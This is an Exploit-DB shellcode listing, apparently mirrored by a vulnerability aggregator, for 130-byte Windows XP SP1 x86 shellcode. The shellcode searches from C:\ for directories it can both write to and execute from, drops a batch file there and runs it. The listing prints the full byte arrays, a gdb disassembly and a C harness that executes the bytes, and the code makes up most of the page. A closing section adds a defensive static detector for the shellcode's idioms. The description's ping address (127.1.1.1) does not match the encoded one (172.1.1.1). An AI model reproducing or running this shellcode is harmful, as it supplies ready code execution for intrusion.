
Windows x86 - Executable Directory Search Shellcode (130 bytes)

Date: 26 Feb 2017. Reported by: Exploit-DB. Type: exploitdb. Source: www.exploit-db.com

# Title: Windows x86 - Executable directory search Shellcode (130 bytes)
# Date: 26-02-2017
# Author: Krzysztof Przybylski
# Platform: Win_x86
# Tested on: WinXP SP1
# Shellcode Size: 130 bytes

/*
Description: 
write & exec dir searcher
starts from C:\
If dir found then write, execute (ping 127.1.1.1) and exit
If Write/noexec dir found then continue

Tested on WinXP SP1 (77e6fd35;77e798fd)
i686-w64-mingw32-gcc shell.c -o golddgger.exe

Null-free version:

(gdb) disassemble 
Dump of assembler code for function function:
=> 0x08048062 <+0>:	pop    ecx
   0x08048063 <+1>:	xor    eax,eax
   0x08048065 <+3>:	mov    BYTE PTR [ecx+0x64],al
   0x08048068 <+6>:	push   eax
   0x08048069 <+7>:	push   ecx
   0x0804806a <+8>:	mov    eax,0x77e6fd35
   0x0804806f <+13>:	call   eax
   0x08048071 <+15>:	xor    eax,eax
   0x08048073 <+17>:	push   eax
   0x08048074 <+18>:	mov    eax,0x77e798fd
   0x08048079 <+23>:	call   eax


NULL-free shellcode (132 bytes):

"\xeb\x19\x59\x31\xc0\x88\x41\x64"
"\x50\x51\xb8"
"\x35\xfd\xe6\x77"                      // exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                      // exit
"\xff\xd0\xe8\xe2\xff\xff\xff"
"\x63\x6d\x64\x2e\x65\x78\x65\x20"
"\x2f\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                          // C:\
"\x20\x26\x46\x4f\x52"
"\x20\x2f\x44\x20\x2f\x72\x20\x25"
"\x41\x20\x49\x4e\x20\x28\x2a\x29"
"\x20\x44\x4f\x20"
"\x65\x63\x68\x6f\x20"
"\x70\x69\x6e\x67\x20"                  
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"  // encodes "172.1.1.1" (description says 127.1.1.1)
"\x3e\x22\x25\x41\x5c\x7a\x2e\x62"
"\x61\x74\x22\x26\x28\x63\x61\x6c"
"\x6c\x20\x22\x25\x41\x5c\x7a\x2e"
"\x62\x61\x74\x22\x26\x26\x65\x78"
"\x69\x74\x29\x29\x22";

*/
// Version containing a NULL byte (130 bytes):

char code[] = 
"\xeb\x16\x59\x31\xc0\x50\x51\xb8"
"\x35\xfd\xe6\x77"                 	// exec
"\xff\xd0\x31\xc0\x50\xb8"
"\xfd\x98\xe7\x77"                  	// exit
"\xff\xd0\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f"
"\x43\x20\x22\x28\x63\x64\x20"
"\x63\x3a\x5c"                      	// C:\
"\x20\x26\x46\x4f\x52\x20\x2f\x44"
"\x20\x2f\x72\x20\x25\x41\x20\x49"
"\x4e\x20\x28\x2a\x29\x20\x44\x4f"
"\x20\x65\x63\x68\x6f\x20\x70\x69"
"\x6e\x67\x20"
"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31"	// encodes "172.1.1.1" (description says 127.1.1.1)
"\x3e\x22\x25\x41"
"\x5c\x7a\x2e\x62\x61\x74\x22\x26"
"\x28\x63\x61\x6c\x6c\x20\x22\x25"
"\x41\x5c\x7a\x2e\x62\x61\x74\x22"
"\x26\x26\x65\x78\x69\x74\x29\x29"
"\x22\x00";

int main(int argc, char **argv)
{
        /* Test harness: treat the byte array as a function and call it. */
        int (*func)();
        func = (int (*)()) code;
        (int)(*func)();
}
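
For triage, the two structural features of this sample can be found statically: the JMP-CALL-POP sequence that locates the embedded command string, and the hardcoded `mov eax, imm32; call eax` targets that tie it to the tested WinXP SP1 build. The following is an added example, not part of the original entry; the function names `find_jmp_call_pop` and `find_abs_calls` are hypothetical, and the sample is the page's stub followed by a deliberately truncated command string.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Sample: the 29-byte stub of the page's 130-byte version, then only the
   first 11 bytes of its command string (truncated on purpose). */
static const unsigned char sample[] =
    "\xeb\x16\x59\x31\xc0\x50\x51\xb8\x35\xfd\xe6\x77\xff\xd0\x31\xc0"
    "\x50\xb8\xfd\x98\xe7\x77\xff\xd0\xe8\xe5\xff\xff\xff"
    "cmd.exe /C ";

static uint32_t le32(const unsigned char *p) {
    return p[0] | p[1] << 8 | p[2] << 16 | (uint32_t)p[3] << 24;
}

/* JMP-CALL-POP: a forward EB rel8 lands on E8 rel32, which calls back to a
   POP r32 (58..5F); the data the POP picks up starts right after the CALL.
   Returns the offset of that data, or -1 if the idiom is absent. */
long find_jmp_call_pop(const unsigned char *b, size_t n) {
    for (size_t i = 0; i + 2 <= n; i++) {
        if (b[i] != 0xEB || b[i + 1] >= 0x80) continue;
        size_t call = i + 2 + b[i + 1];
        if (call + 5 > n || b[call] != 0xE8) continue;
        int32_t rel = (int32_t)le32(b + call + 1);
        long target = (long)call + 5 + rel;
        if (rel < 0 && target >= 0 && (b[target] & 0xF8) == 0x58)
            return (long)call + 5;
    }
    return -1;
}

/* Collect the immediates of "mov eax, imm32; call eax" (B8 imm32 FF D0):
   absolute API addresses that tie a sample to one OS build. */
size_t find_abs_calls(const unsigned char *b, size_t n, uint32_t *out, size_t max) {
    size_t k = 0;
    for (size_t i = 0; i + 7 <= n && k < max; i++)
        if (b[i] == 0xB8 && b[i + 5] == 0xFF && b[i + 6] == 0xD0)
            out[k++] = le32(b + i + 1);
    return k;
}

int main(void) {
    uint32_t addr[4];
    long off = find_jmp_call_pop(sample, sizeof sample);
    size_t n = find_abs_calls(sample, sizeof sample, addr, 4);
    if (off >= 0) printf("data at +%ld: \"%s\"\n", off, (const char *)sample + off);
    for (size_t i = 0; i < n; i++) printf("absolute call target: 0x%08x\n", (unsigned)addr[i]);
    return 0;
}
```

Both checks are heuristics over raw bytes without disassembly, so a match is a lead for further analysis rather than a verdict.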

Vulners AI Score: 7.4 (High risk)